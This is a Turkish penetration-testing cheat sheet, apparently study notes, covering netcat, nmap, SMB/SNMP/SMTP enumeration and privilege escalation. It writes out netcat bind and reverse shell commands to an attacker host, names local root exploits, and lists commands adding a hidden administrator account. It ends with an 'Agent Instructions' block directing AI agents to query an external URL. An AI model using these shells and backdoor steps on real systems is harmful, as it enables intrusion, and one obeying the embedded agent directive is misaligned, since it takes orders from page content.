# Temel Komutlar ve Araçlar

### Dosya/Dizin Arama

```
# find / -name musana* -type [d,f] -exec file {} \;
```

### Servisler

```
# service [apache2, ssh, postgresql] [start,restart,stop]

# /etc/init.d/apache2 restart
```

> Servislerin kalıcı olarak çalıştırılması(reboot olduktan sonra bile oto başlama)

```
# update-rc.d ssh enable
# update-rc.d apache2 enable
# rcconf (manage over gui)
```

### Bash

```
# cat index.html | grep "href=" | cut -d "/" -f 3 | grep "domain\.com" | cut -d '"' -f 1

# for url in $(cat ip.txt); do host $url; done

# for ip in $(seq 130 160); do ping -c 1 192.168.1.$ip done
```

## Araçlar

### rdesktop

```
# rdesktop -u offsec -p Password IP
```

### Netcat

Banner Grabbing;

```
# nc -nv IP PORT
```

File Transfer;

```
# nc -nv IP PORT </usr/share/wordlist/test.txt (Sender)

# nc -nvlp PORT > incoming.txt (receiver)
```

#### Command Execution;

**Senaryo 1**: Eğer kurban makine doğrudan public ip adresi üzerinden internete erişiyorsa bu senaryo kullanılır. Kurban tarafında herhangi bir port yönlendirmeye ihtiyaç yoktur. Eğer saldırgan firewall/nat arkasında ise bu senaryoyu kulllanırsa kendi tarafında herhangi bir port yönlendirme yapmasına gerek yoktur. (Bind Shell)

```
# nc IP PORT (Attacker Machine)

# nc -vlp PORT -e cmd.exe (Victim Machine)
```

Senaryo 2: Eğer kurban makine bir firewall/nat arkasında ise bu durumda saldırgan kendi tarafında bir portu dinlemeye alır.(Ya saldırganın public ip adresiyle internete çıkmalı yada port yönlendirmelidir.) Saldırgan Bu işlemden sonra kurban makineden kendi makinesine reverse shell isteği yollar.

```
# nc -vlp PORT (Attacker Machine)

# nc ATTACKER-IP PORT -e /bin/bash (Victim Machine)
```

### Ncat

nmap tarafından geliştirilmiştir. Güvenlik cihazlarını atlatmak için bazı özelliklere sahiptir. nc clear-text olarak gider. ncat ise aradaki veriyi şifreleyerek gönderir.(Bind Shell)

```
# ncat -v IP PORT --ssl (Attacker Machine)

# ncat -vlp PORT -e cmd.exe --allow ATTACKER-IP PORT --ssl (Victim Machine)
```

## Passive İnfo Gather

GHDB;

```
 site:"sitename.com"
 filetype:pdf
 intitle:"İndex Of"
 inurl:"admin.php"
 intext:"admin password"
```

## Active İnfo Gather

```
host -t [ns,a,mx,cname,txt] musana.net
```

DNS Lookup : Domain adresinden IP adresini bulma.

Reverse DNS Lookup : Bir IP adresinde bulunan diğer domainlere ulaşma.

### Zone transfer

```
# host -l musana.net ns1.musana.net
```

### Nmap

```
# nmap IP

# nmap -sn IP (ICMP scan!, Ping Sweep, No port Scan)

# nmap -sT --top-ports 20 IP (TCP connection scan, en çok kullanılan 20 port)

# nmap -A IP (get banner, version, os detect, port scan)

# nmap --script *iis* IP

# nmap --script *smb* -p 139,445 IP

# nmap -p 139,445 IP --open (SMB Scan)

# nmap -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 IP (***)

# locate *.nse | grep sbm

# nmap -v -p 80 --script http-vuln-cve2010-2861 IP (Directory Traversal)

# nmap -v -p 80 --script all IP (tested all script)
```

### nbtscan

NetBIOS name information

```
# nbtscan 192.168.2.0/24
```

### rpcclint

```
# rpcclient -U "" IP (password is empty)
rpcclient $> getdompwinfo (Get password policy)
```

### enum4linux

Enum4linux is a tool for enumerating information from Windows and Samba systems.

```
# enum4linux -v IP
```

### SMTP

```
# nc -nv IP 25 (Banner Info)
VRFY bob (250 user exist)
VRFY dontexist (550 user does not exist)
```

**Smb User Enumeration**;

`# for user in $(cat users.txt); do echo VRFY $user | nc -nv IP 25 2 > /dev/null | grep ^"250"; done`

**Do list** adding python script!

### smbclient

```
# smbclient -N -L IP
```

### SNMP

> For managing network device. UDP based! IP spoof. Clear-text. Weak Auth. Reflection Attack! Port: 161

```
# nmap -sU --open -p 161 IP
# onesixtyone -c community -i <ip.txt>
# snmpwalk -c public -v1 IP (for weak community string)
# snmpwalk -c public -v1 IP mib-vales (running proccess)
# snmpwalk -c public -v1 IP mib-vales (open port)
# snmpwalk -c public -v1 IP mib-vales (install software)
```

> snmpenum or snmpcheck (other tool)

## Vulnerability Scanning

\*\* slmail rce exploit.

TFTP udp based file transfer protocol. Windows 2003/XP/7. port 69.

## Privilege Escalation

### Linux

```
# cat /etc/issue (distro info)
# uname -a (kernel info )
```

> mempodipper - Linux root exploit >=2.6.39 x64 and x86 gcc exploit.c -o exploit

### Windows

> ms11-080 afd.sys privilege escalation exploit grouppolicy bak
>
> ```
> # net user test test /add
> # net localhroup administrators test /add
> # net localgroup "Remote Desktop Users" test /add
> ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security.musana.net/temel-komutlar-ve-araclar.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.